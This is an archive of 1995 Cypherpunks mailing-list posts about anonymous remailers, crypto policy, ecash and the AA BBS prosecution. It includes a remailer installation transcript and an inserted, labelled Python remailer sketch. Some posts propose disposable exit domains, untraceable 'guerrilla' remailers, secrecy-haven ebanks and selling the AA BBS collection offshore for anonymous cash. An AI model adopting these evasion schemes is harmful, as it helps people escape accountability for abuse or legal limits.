From: sameer <sameer@c2.org>
Date: Sat, 21 Jan 95 15:38:22 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Remailer In a Box available for beta testing
In-Reply-To: <X2C8lKjqRWmA077yn@mirage.skypoint.com>
Message-ID: <199501212041.MAA08262@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> One minor question, is it possible to set it up so that it is not a final
> hop remailer. In other words the remailer is set up to pass its mail on to
> another remailer which is the final destination (preferably non-U.S.) If
> so, I'm in. I've already got my account on c2 doing three things, what's
> one more. If we could make this possible, it could really propagate
> remailers as it removes some of the liability from those who can't afford
> it.

	Yes. That's one of the questions the installation asks you.  I
should post a transcript of the installation to the list to show how
easy it is..

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sat, 21 Jan 95 03:52:49 PST
To: cypherpunks@toad.com
Subject: Re: Netherlands crypto ban?
Message-ID: <199501211152.AA05246@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


In article <gate.HRP0yc1w165w@dxm.ernet.in> you stated:

: What's the update on the move to ban private crypto in Holland? 
: Last I remember there were trial balloons, but nothing happened.

The proposed ban came from the former fundamentalist christian led
department of justice. Since the elections the political landscape
has been changed, the christian democratic party has been removed,
we now have Liberals (something like Republicans in the US :) ),
Socialists and Social Democrats in power. 

Law Enforcement has come under public scrutiny, since special police
teams used unlawful tactics to get criminal organizations out of 
their business. They broke into Warehouses to see if narcotics were
deposited there (without a warrant), they made up reports and lied in
court. 

The new head of the justice department, already has dropped some 
policies that were in place, and she just announced that due to the
rise in competence of the LEA the rights a suspect has also have to be
raised in order to compensate it. She swiftly killed off any opposition
the LEA had against that proposal. 

In my opinion, The Netherlands will not adopt a crypto policy on their
own, they'll do it if the EC proposes such a "thing". 

--
Alex de Joode					    
usura@replay.com	                               Hate mail appreciated,
http://www.xs4all.nl/~usura             weekly contest for best death threat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Jan 95 15:38:11 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501211711.JAA13370@largo.remailer.net>
Message-ID: <199501212055.MAA09018@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Now setting up new domain names, while pretty easy, requires the
> cooperation of DNS operators.  Typically these connections have been
> informal and a low barrier to entry but only if you know somebody who
> does domain names.  DNS operation is not yet a separate service to
> buy, but I suspect it will become so.  In the meanwhile the offers of
> DNS provision by John and Strick are welcome.
> 

	I sell DNS service as well. See
http://www.c2.org/services/DNS_MX.html

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@tis.com>
Date: Sat, 21 Jan 95 10:34:47 PST
To: eric@remailer.net
Subject: Re: Key backup (was: How do I know . ..)
In-Reply-To: <199501202154.NAA09818@comsec.com>
Message-ID: <9501211806.AA20473@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 18 Jan 1995 19:38:54 -0800
>From: eric@remailer.net (Eric Hughes)
>
>   From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>
>
>   Safe deposit boxes, by virtue of their accessibility to law enforcement,
>   are subject to search and seizure under court order and are sealed
>   in certain cases (probate). This makes them likely to be the first place
>   to look when the Feds decide that we can't have keys anymore. 
>
>I am not designing systems for the paranoid fantasy of an inspection
>of all safety deposit boxes by government agents in search of
>contraband.
>
>I am interested in designing systems which will fit into business as
>usual, that are inconspicuous by their prevalence, and which will be a
>part of ordinary and usual protection of data by cryptographic means.

On the less paranoid side of this, you might check out TIS's Data Recovery
Center plans.  ftp://ftp.tis.com/pub/crypto/drc/ and below.
That location will have some code for interfacing to the prototype DRC in a
week or two.  Send me e-mail if you want to be on the mailing list for
notification of code availability/updates.


On the more paranoid side of this, in spite of Steve Walker's relish over
the fact that TIS's CKE (Commercial Key Escrow -- his name for the DRC
work) keeps keys out of government hands, except in cases of actual search
warrant, it looks (according to one privacy-advocate lawyer I discussed
this with) as if access can be gained with a mere subpoena -- and,
according to Scott Charney (of Justice Dept., if I remember correctly) the
current view is that if you voluntarily give a copy of your key to your
employer, you've abandoned your presumption of privacy and that relieves
the gov't of getting a search warrant (and maybe even subpoena).


 - Carl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sat, 21 Jan 95 04:09:24 PST
To: cypherpunks@toad.com
Subject: Re: Remailers-in-a-box
Message-ID: <199501211209.AA07362@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


: I guess it'd be possible to treat remailers as disposable - when one
: had pissed off enough people, it could be abandoned - but this lack
: of long-term reliability seems poor.

The entry point of a remailer could be "fixed", the exit point is where
the heat is on.

 - The entry point of a remailer is entry@remail.org, 

 - entry@remail.org has a forward file to: batch@remail.org

 - batch@remail.org does the actual remailing, since remail.org has
   installed some sort of MX'ing all messages that leave batch@remail.org
   will advertise themself as nobody@expendable.org .

 - If you "lose" expendable.org, you simply set up a new account with
   MX'ing, the remailer-users will only notice the change in exit-header,
   the entry-point of that remailer is still entry@remail.org

Of course you can make this as complicated as you like. :)


Regards,
--
Alex de Joode					    
usura@replay.com	                               Hate mail appreciated,
http://www.xs4all.nl/~usura             weekly contest for best death threat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Sat, 21 Jan 95 15:40:23 PST
To: cypherpunks@toad.com
Subject: SysLaw and DigiCash
In-Reply-To: <VH6D1c2w165w@dxm.ernet.in>
Message-ID: <199501211906.OAA02426@tuatora.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rishab Aiyer Ghosh writes:
 > > Second, I didn't know Lance Rose was a lawyer, or even a "SysLawyer"
 > 
 > No, I don't think he's a lawyer, but he wrote SysLaw which is widely hyped
 > as _the_ law book for BBS sysops. It's actually not that good - the EFF
 > recommends another one the name of which I've forgotten. 

I just picked up a copy of "Cyberspace and the Law" -- when I'm
through with it, I'll post a review. It looks to be a nice, broad
survey, but it looks suspiciously thin for a book on law :-)

While I'm posting, have I missed any good rants from folks who've had
a crack at the DigiCash beta test? I had a few criticisms of the end
result, but I'd rather not introduce further redundancy.

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous@c2.org (Q Mixmaster Remailer)
Date: Sat, 21 Jan 95 15:35:08 PST
Subject: Re: Why emoney?  Why not a web of debt?
In-Reply-To: <199501210224.PAA22017@iconz.co.nz>
Message-ID: <199501212207.OAA12068@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Sat, 21 Jan 1995 15:18:48 +1300
> From: davidm@iconz.co.nz (David Murray)
> 
> But of course, since ecash is worth only what you can get for it, the web of
> trust model, since it reflects what people will give for it, seems to
> reflect that underlying value much better.

  Oh... Nice...  I hadn't thought of that...

> The best way to underpin the value of ecash is for the issuer to (credibly)
> undertake to convert it into real money.

  And since I would only make the promise to the few people that I am
connected to in the debt-trust web, this is doable.  I doubt I could
convince all of you that I was good for $10, but I bet there are a few
readers on this list that I *could* convince.  They would be able to
convince a few others that _they_ are worth $10, etc.

  This system might even dodge the laws governing banking in various
jurisdictions ... though I doubt it.  It quacks, waddles, and water
runs off its back...

  Noyb





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sat, 21 Jan 95 15:41:17 PST
To: cypherpunks@toad.com
Subject: Re: The Remailer Crisis
Message-ID: <ab470c4102021004ffbf@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 PM 01/20/95, Rhys Kyraden wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Okay. Here's my 2-bits.
>I run on the MacOS, but how hard could it be to port this code?

If you are talking about remailer code, rather, I think.  The mac doesn't
have a built in mail system, like unix systems generally do, which you kind
of need.    First you've got to get a hold of a mail system for the MacOS,
ideally not POPMail like Eudora, but actual receiving mail directly to your
mac, and then you've got to modify it to do remailing.  And that
modification isn't going to be nearly as easy as in the world of unix with
its .forward files and /etc configuration files that let you pretty much
direct output wherever you want.    Basically, the amount of code you are
going to have to be writing from scratch is going to outweigh any "porting"
you are able to do with salvageable code.

On the other hand, you could base a remailer on Eudora.  Which means that
people would write to your normal mail account with mail-to-be-remailed,
and by means of some header lines distinguish the mail to be remailed.
Eudora can filter mail according to header lines.  And Eudora is
applescriptable, and can call an external applescript (or actual binary
executable program, if it does apple events. Which isn't trivial), and tell
it new mail has arrived to be dealt with.  Theoretically the external
program could even check the body of the message for a
::
Request Remailing-To:
So they wouldn't need to put anything special in the header, like they
don't need to with current remailers, even ones that run out of people's
normal shell accounts.

Theoretically, you could do that. But it would be rather unreliable, and
slow.  And if there was a lot of remailer traffic, it would get in the way
of your normal email.  I'm not sure it's worth putting in the amount of
effort necessary for what you are going to get.  On the other hand, the
amount of effort necessary would be much much less than writing remailer
code which worked with a mac mail system instead of POP mail, as discussed
above. I dunno.
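
An added example, not part of the original posts and not code from any remailer discussed on the list: a minimal Python sketch of the body check described in this message (the "::" block with Request-Remailing-To:) combined with the fixed-entry, replaceable-exit addressing from Alex de Joode's "Remailers-in-a-box" message. The function names, the single-recipient check, and the example.com/example.net addresses are assumptions made for illustration.

```python
import email
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

ENTRY_ADDRESS = "entry@remail.org"      # fixed entry point named in the thread
EXIT_ADDRESS = "nobody@expendable.org"  # replaceable exit identity named in the thread

# Constructed sample request, as a user would mail it to the entry point.
SAMPLE_REQUEST = """\
From: alice@example.com
To: entry@remail.org
Subject: hello
Message-ID: <constructed-1@example.com>
Received: from alice-pc.example.com by remail.org

::
Request-Remailing-To: bob@example.net

The body that Bob should see.
"""


def split_pseudo_headers(body):
    """Split a body into ({directive: value}, remaining_text).

    A remail request starts with a line holding only '::', followed by
    header-style lines and then a blank line. Anything else is ordinary mail.
    """
    lines = body.lstrip("\r\n").splitlines()
    if not lines or lines[0].strip() != "::":
        return {}, body
    directives = {}
    i = 1
    while i < len(lines) and lines[i].strip():
        name, sep, value = lines[i].partition(":")
        if not sep:
            raise ValueError("malformed directive line: %r" % lines[i])
        # Normalise case; also accept 'Request Remailing-To' as typed in the post.
        directives[name.strip().lower().replace(" ", "-")] = value.strip()
        i += 1
    return directives, "\n".join(lines[i + 1:])


def check_destination(value):
    """Allow exactly one plain address so one request cannot fan out to a list."""
    _, addr = parseaddr(value)
    if "," in value or ";" in value or addr.count("@") != 1 or " " in addr:
        raise ValueError("refusing destination: %r" % value)
    return addr


def remail(raw_message, exit_address=EXIT_ADDRESS):
    """Return the outgoing EmailMessage, or None if this is not a remail request."""
    incoming = email.message_from_string(raw_message, policy=policy.default)
    if incoming.is_multipart():
        return None
    directives, rest = split_pseudo_headers(incoming.get_content())
    if "request-remailing-to" not in directives:
        return None  # ordinary mail: leave it for the normal mailbox
    # Build the outgoing message from empty headers instead of deleting
    # fields from the incoming one, so no sender header can leak through.
    outgoing = EmailMessage()
    outgoing["From"] = exit_address
    outgoing["To"] = check_destination(directives["request-remailing-to"])
    outgoing.set_content(rest)
    return outgoing


if __name__ == "__main__":
    print(remail(SAMPLE_REQUEST).as_string())
```

Passing a different `exit_address` models replacing expendable.org: users keep mailing the same entry address and only the exit header changes.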






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hkhenson@cup.portal.com
Date: Sat, 21 Jan 95 15:34:52 PST
To: cypherpunks@toad.com
Subject: AA BBS report
Message-ID: <9501211449.1.20646@cup.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have been keeping the net up on the AA BBS case since it started
last year.  Latest news (1/21/95) is that bail during appeal was
denied by the Sixth Circuit, and that Robert is to report to federal 
prison Feb. 8, in Springfield, MO to serve 3 years, one month.  I have 
no doubt that picking a place that far from his home and family was 
done on purpose as part of the punishment.  

Question for Mike Godwin:

Who pays transport from Springfield back to Utah so Robert can be 
present for the bogus kiddy porn trial in a few months?  Also being in 
prison will make it nearly impossible for him to prepare the .gif 
files his lawyer wants to present in his defense. 
  
They set the date (July 12) and place (Dublin, CA) for Carleen 
(Robert's wife).  She is to serve 2 years, 2 months.  I think the 
reason they are letting her start later is so she can be present when 
their oldest son graduates from high school.

AA BBS is still up, and may well stay up for the whole time Robert is 
in prison.  He has no other way to support his family or pay for legal 
defense.  Also, outside of western TN, OK, Utah, and other backwards 
places, what he is selling is legal--even protected under the First 
Amendment.  (Though some of it *is* kinda gross :-) ) 

AA BBS is up to about 25,000 files.  There is a good chance that they 
will be available through the internet at some point.

Trying to control information in the network age is about as successful 
as pissing into the wind.  

Keith Henson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 21 Jan 95 15:34:10 PST
To: cypherpunks@toad.com
Subject: Remailer in a Box transcript
Message-ID: <199501212305.PAA14235@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	The remailer created with the following transcript was created
for test purposes only. It is not to be used as a remailer.

infinity:infinity/rtest 3:02pm [10] > /usr/local/lib/boxed-remailer/install_remail 
Installation version 1.1
Making remail dir
Preparing forward file
You have the option of running a hidden remailer. If you are running
a hidden remailer mail to your remailer gets auto-forwarded to another
remailer where it is processed. That way your remailer is less likely
to come under attack because no one gets anonymous mail directly
from your remailer.
Would you like to run a 'hidden' remailer? [N]/y n
Your personal address would be a good thing to put in Complaints-To:
What should be put in the Complaints-To: header? Remailer Operator <sameer@c2.org>
Sending anon mail to self in a self-test
Remailer test complete
Would you like to subscribe to the remailer-operators@c2.org list? [Y]/n n
Ok.. done creating the anonymous remailer
Your old .forward file (if it existed) is now in .forward.0
Run "remailer_remove" (It will be installed in /home/infinity/rtest/bin)
To erase the remailer and restore your old .forward file
Installing remailer_remove in /home/infinity/rtest/bin
Now you have to create a PGP key for the remailer
Make sure you choose a key appropriate to a remailer
"Anon Remailer <rtest@c2.org>" would make a good keyid.
Please choose a key length of less than 1024 bits. Otherwise
the remailer will produce too much load on the system.
Hit return:
Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses.
(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94
Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
Distributed by the Massachusetts Institute of Technology.
Export of this software may be restricted by the U.S. government.
Current time: 1995/01/21 23:03 GMT
Pick your RSA key size:
    1)   512 bits- Low commercial grade, fast but less secure
    2)   768 bits- High commercial grade, medium speed, good security
    3)  1024 bits- "Military" grade, slow, highest security
Choose 1, 2, or 3, or enter desired number of bits: 1
Generating an RSA key with a 512-bit modulus.

You need a user ID for your public key.  The desired form for this
user ID is your name, followed by your E-mail address enclosed in
<angle brackets>, if you have an E-mail address.
For example:  John Q. Smith <12345.6789@compuserve.com>
Enter a user ID for your public key: 
Anon Remailer <rtest@c2.org>

You need a pass phrase to protect your RSA secret key.
Your pass phrase can be any sentence or phrase and may have many
words, spaces, punctuation, or any other printable characters.

Enter pass phrase: 
Enter same pass phrase again: 
Note that key generation is a lengthy process.

We need to generate 464 random bits.  This is done by measuring the
time intervals between your keystrokes.  Please enter some random text
on your keyboard until you hear the beep:
   0 * -Enough, thank you.
...**** .**** 
Key generation completed.
What did you name your remailer? Anon Remailer <rtest@c2.org>
What was the passphrase you chose? key
Running a self-test of PGP
Ran self-test of PGP
**************************************************
**************************************************
VERY IMPORTANT DO NOT ANSWER THIS QUESTION LIGHTLY
**************************************************
**************************************************
        Would you like to send the key that you generated for the
anonymous remailer sent to the remailer operators list? This means
that your remailer will be publically announced to the world. Make
sure that the UserID you chose is of a form reasonable for a remailer,
such as "Joe's Remailer <joe@c2.org>", or things could be a bit
messy.  Do not answer this question lightly.
Would you like to send your key to the list? [N]/y n
infinity:infinity/rtest 3:03pm [11] > 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Fri, 20 Jan 95 18:25:38 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney?  Why not a web of debt?
Message-ID: <199501210224.PAA22017@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


>At 6:54 PM 01/20/95, anonymous-remailer@shell.portal.com wrote:
>>  But electronic computers are good at checking out these kinds of
>>chains automatically.  Suppose there were a web of debt-trust.  Each
>>person would indicate the other people whose iou's they will accept
>>(and the amount they would be willing to take).
>
>Certainly, that's what money is after all. Pretty much.  But how are you
>going to transfer these IOUs electronically in a way that is relatively
>fraud-proof?  Digital money.  Ecash. [...]
> And another way to look at it is that you are just proposing an
>ecash system where every person issues their own ecash, instead of just a
>few central banks doing it.

The question of how to value ecash issued by different entities of varied
credit-worthiness is an interesting one. I had been thinking along the lines
of one or more centralised (but independent) credit rating agencies (a la
Standard and Poors or Moodys) that one would subscribe to. Then you would
value the various edollars in terms of their credit rating -- so you might
sell something for $4 of CyberCash (NA) BV ecash, or $5 of FliBiNite NL 
ecash and so on.

But of course, since ecash is worth only what you can get for it, the web of
trust model, since it reflects what people will give for it, seems to
reflect that underlying value much better.

The best way to underpin the value of ecash is for the issuer to (credibly)
undertake to convert it into real money. This gets around the problem of 
no one on the net making enough things you want: the old 'you can't eat
cyberspace' saw. McDonalds may not accept ecash, but if a simple trip to the
relevant ebank's Web page can put the price of a Big Mac in your real-money
account, that is only a timing problem.

[Of course, you have to come out from behind the anonymous ecash shield to 
do that, but that is a problem of being a real person. If you want to keep
your wealth anonymous, don't buy a flash car and the latest Monet to go
on sale -- invest it in an anonymous corporation.]

An ebank along these lines could be set up reasonably cheaply (apart from
the technical hurdles ;-), and could easily scale up as needed, and migrate
to safer (taxhaven/banking secrecy) jurisdictions when turnover etc
warranted it.

David





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:48:45 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook wrote:

> There can be little question that any attacks on remailers and civilian
> strong crypto will face challenges on the basis of Free Speech and Equal
> Protection.  The question is: can the state show compelling interest?  I
> believe that it can.  Anonymous agents, by their very nature, are immune
> from state restraint.  Since our entire legal system centers around state
> restraint, I believe that Free Speech and Equal Protection will fall to the
> four horsemen.

But mail and messages from "foreigners" is also "immune from state
restraint," and yet we haven't seen either a ban on mail from outside
the U.S. or a requirement that such mail be inspected, identified,
etc.

(I'm not sure if your line "our entire legal system centers around
state restraint" refers to state constraint of citizens, as you seem
to imply in your conclusion, or constraint _of_ the state, as the
Constitution seems to imply.)

Likewise, if I receive a letter, open it, and find a request to remail
it to another address, isn't this equivalent to our remailers? Does
this imply a compelling State need to open all mail?

Does the plotting of various crimes in private homes imply a
compelling State need to place microphones and video cameras in such
places?

Clearly not, so I don't think the privacy of e-mail will soon be
breached just because there are some abuses in some people's minds.

> There is the general question of political speech.  Unfortunately, there is
> little anonymous _US_ political speech.  Furthermore, sedition is a crime,
....
> I believe, therefore, that both the court and the dissent bode poorly for
> anonymous encrypted mail.

But anonymous handbills are quite common, posted all over the place
here in my home town, and the Supreme Court ruled quite properly that
identities are not required for speech. Likewise, radio call-in shows
are dominated by anonymous call-ins.

Ditto for "Name Withheld by Request" letters to the editor, etc.

Lots of speech is not anonymous, because Congresscritters are
identified, because Rush Limbaugh obviously _wants_ his name
publicized, because I want my name attached to my views, etc. But not
because there's any law saying political speech cannot be anonymous.

Quite the contrary.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: moulton@netcom.com (Fred C. Moulton)
Date: Sat, 21 Jan 95 15:50:32 PST
To: cypherpunks@toad.com
Subject: Computerworld Article
Message-ID: <199501212347.PAA10248@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I have recently seen several messages about the article in the 
14-Jan-95 issue of The Economist, I do not recall seeing any
mention of a similar, but shorter article in the 16-Jan-95
issue of Computerworld, p.20.

The Computerworld article covers much of the same ground,
however I will quote the last three paragraphs of the story.
Tim May and Cypherpunks are mentioned at the end.

        At one point in 1994, rank-and-file members
    were angrily posting "EFF sellout" notes on the
    Internet.  The reason was the EFF's decision to
    negotiate with sponsors of the fast-moving digital
    wiretapping bill - an anathema to many
    privacy advocates - rather than oppose the bill.
        The legislation, which was strongly backed
    by the Federal Bureau Of Investigation and
    quickly passed, requires telephone companies
    to re-engineer their digital networks to enable
    court-ordered wiretaps.  The EFF agreed not to
    oppose the bill after cutting a deal to include
    some privacy protections and exclude the Internet
    and on-line networks.
        But the Washington maneuvers did not sit
    well with some EFF members.  "I've written
    them off" said Timothy C. May, co-founder of
    the Internet's Cypherpunks discussion group
    encryption.  "They don't represent my interests.
    They're not a member-driven, grassroots organization."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Claborne, Chris" <claborne@microcosm.sandiegoca.ATTGIS.COM>
Date: Sat, 21 Jan 95 16:08:43 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Cripto FAQ in Hypertext HTML
Message-ID: <2F21A118@microcosm.SanDiegoCA.ATTGIS.COM>
MIME-Version: 1.0
Content-Type: text/plain



   Because I wanted to share the RSA Cryptography FAQ on WWW with our local
users, I have converted your document, verbatim, to HTML Hypertext.

The entire Table of Contents is clickable so that you can zoom to the
particular area of interest.

I can FTP somewhere public you would like (I don't know where to stash this
kind of thing).

It could probably use some more links in it where the document suggests that
the reader go to another section for more information but... I will leave that
up to someone else.

 -- 
                                       ...  __o
                                      ..  _`\<,_
Chris.Claborne@SanDiegoCA.ATTGIS.Com  ...(*)/ (*).          CI$: 76340.2422
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
<#include standard disclaimer regarding my opinion and not my company's >
<#include some philosophical comment >




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@rahul.net
Date: Sat, 21 Jan 95 16:41:42 PST
To: cypherpunks@toad.com
Subject: transient guerrilla remailers
Message-ID: <199501220041.AA02723@bolero.rahul.net>
MIME-Version: 1.0
Content-Type: text/plain


If c2.org can offer RIAB accounts on a pre-paid basis, what's to
stop people interested in the cause from paying anonymously,
setting up the RIAB, and just walking away? When the pre-paid period
expires, the remailer goes away. If the RIAB package could communicate
its existence and impending death to the pinging and verification services, 
the transient nature of remailers wouldn't be a problem. It would be hard
to harass an unknown walkaway remailer operator who has no involvement
with the day to day operations. If Tim's theory of isolating the
responsibilities of the remailer operator and the site owner are held to
be valid, c2.org would be off the hook. After all, c2.org didn't actually
set up the remailer, John Doe did. Finding JD would be impossible from
a practical standpoint, and since the remailer only lived for a few months,
the motive to find and attack it is less. . . a true "Guerrilla" RIAB.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 21 Jan 95 17:04:03 PST
To: cypherpunks@toad.com
Subject: AA + Anonymous ECash = Unhappy Fundies
Message-ID: <199501220101.RAA20030@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


hkhenson@cup.portal.com writes:

 > AA BBS is still up, and may well stay up for the whole time
 > Robert is in prison.  He has no other way to support his
 > family or pay for legal defense.  Also, outside of western
 > TN, OK, Utah, and other backwards places, what he is selling
 > is legal--even protected under the First Amendment.  (Though
 > some of it *is* kinda gross :-) )

But certainly no worse than the stuff which regularly flows
through a.b.p.tasteless and a.b.p.bestiality.

 > AA BBS is up to about 25,000 files.  There is a good chance
 > that they will be available through the internet at some
 > point.

It strikes me that this would be the perfect way to generate
consumer interest in anonymous digital cash protocols.  The
entire AA collection, hooked up to the net through a T-3, and
available for a nominal fee per GIF, could easily make the AA
Sysops millionaires by the time their sentences are over.  Such a
setup would make their pictures available to everyone, not just
the limited number of people their BBS has the capacity to
handle.

Perhaps the server could be placed securely overseas in a neutral
country which still respects privacy and free speech.  Orders could
be encrypted using the server's PGP key and the customer could 
specify the passphrase to be used to IDEA encrypt the "goods"
prior to shipment, ala NetBank.  

 > Trying to control information in the network age is about
 > as successful as pissing into the wind.

When the government pisses into the wind, the citizens get wet.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: werewolf@io.org (Mark Terka)
Date: Sat, 21 Jan 95 15:48:40 PST
To: cypherpunks@toad.com
Subject: Freenet Remailers (Again)
Message-ID: <1zO8lOwsccw0077yn@io.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I keep periodically asking this question, but has any progress been made on
making the remailer software compatible with the remailer software found on
Freenets?

The question is even more pertinent now that we seem to be having a problem
maintaining a satisfactory number of remailers operational and reliable. Is
there any consensus as to whether it can be done  or not? I'd give it a shot
using my Cleveland account to see how workable it is (ie, how long it takes
for the Freenet operators to shut it down :>).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 21 Jan 95 18:35:17 PST
To: cypherpunks@toad.com
Subject: Re: AA + Anonymous ECash = Unhappy Fundies
In-Reply-To: <Pine.3.89.9501211849.A10943-0100000@Tux.Music.ASU.Edu>
Message-ID: <199501220233.SAA07490@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ben Goren <ben@Tux.Music.ASU.Edu> writes:

 > Actually, this strikes me as a worst case scenario as far
 > as promoting cryptography goes.

It's two things.  It's a "killer app" for strong crypto, and at
the same time, a crypto public relations disaster.

Let me now make the argument that the advantages of the first far
outweigh the disadvantages of the second.

Success in spreading cryptography will not be achieved by
convincing the government that we are all nice people with noble
motives and asking their permission.  It will be achieved by
writing neat code like PGP which protects privacy and individual
freedom regardless of the plans of the state.

The public has already been indoctrinated by the government that
cryptography permits Terrorists, Pedophiles, and Drug Dealers to
thumb their noses at law enforcement, and has been fed a
comprehensive series of alarmist scenarios about what this might
imply.  Terms like "message laundering" are beginning to be used
in the media to describe fundamental Cypherpunk technology, and
the level of public anxiety about such issues is being
deliberately raised.

Robert Anton Wilson once commented that freedom and democracy
make infrequent appearances in the totality of human history
because "All you have to do is frighten the people, and they will
beg you to take their freedoms away." We probably only have a
short time remaining in which to implement a privacy-friendly
world Net before the Powers That Be(tm) engineer consent for the
implementation of something much more Draconian.

Given the current political climate, there is therefore little
incremental heat likely to be born from the revelation that
strong crypto permits people to purchase AA GIFs, and
considerable likely benefit from being able to implement and test
strong crypto based digital cash technology in conjunction with a
virtually unlimited highly motivated customer base.

There is also the added advantage of generating revenue to assist
the AA BBS Sysops with their legal problems, before the
precedents created become OUR legal problems.

 > Don't get me wrong--I have no interest in telling people
 > they can't look at whatever pictures they want, or prevent
 > others from selling those pictures to them. But...to make
 > such a close association between what Joe Public considers
 > degenerate trash and cryptography....

Some Islamic country (I forget which one) quashed opposition by
the clergy to the introduction of television by reading the Koran
over the first television channel to be installed.  Our
government does much the same in reverse, by demonstrating to the
stupid peasants how unwanted cryptographic technology can be used
to conceal pictures of naked children or bomb plans.

 > The "cause" will do much better if the first major
 > association is made with something much less controversial.
 > Girl Scout cookies, say.

Fear, Greed, and Gonads are the major human motivators which must
be tapped for symmetry-breaking change in social organization to
occur. AA GIFs are directly targeted at the third of these.  Girl
Scout Cookies have no significant cross-section with any of these
motivators, are already available everywhere, and are much more
difficult to transmit in binary form. :)

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Goren <ben@Tux.Music.ASU.Edu>
Date: Sat, 21 Jan 95 17:36:06 PST
To: Mike Duvos <mpd@netcom.com>
Subject: Re: AA + Anonymous ECash = Unhappy Fundies
In-Reply-To: <199501220101.RAA20030@netcom5.netcom.com>
Message-ID: <Pine.3.89.9501211849.A10943-0100000@Tux.Music.ASU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Jan 1995, Mike Duvos wrote:
> hkhenson@cup.portal.com writes:
> [. . .]
>  > AA BBS is up to about 25,000 files.  There is a good chance
>  > that they will be available through the internet at some
>  > point.
> 
> It strikes me that this would be the perfect way to generate
> consumer interest in anonymous digital cash protocols [. . . .]

Actually, this strikes me as a worst case scenario as far as promoting
cryptography goes. Don't get me wrong--I have no interest in telling
people they can't look at whatever pictures they want, or prevent others
from selling those pictures to them. But...to make such a close
association between what Joe Public considers degenerate trash and
cryptography.... 

The "cause" will do much better if the first major association is made
with something much less controversial. Girl Scout cookies, say. 

b&
--
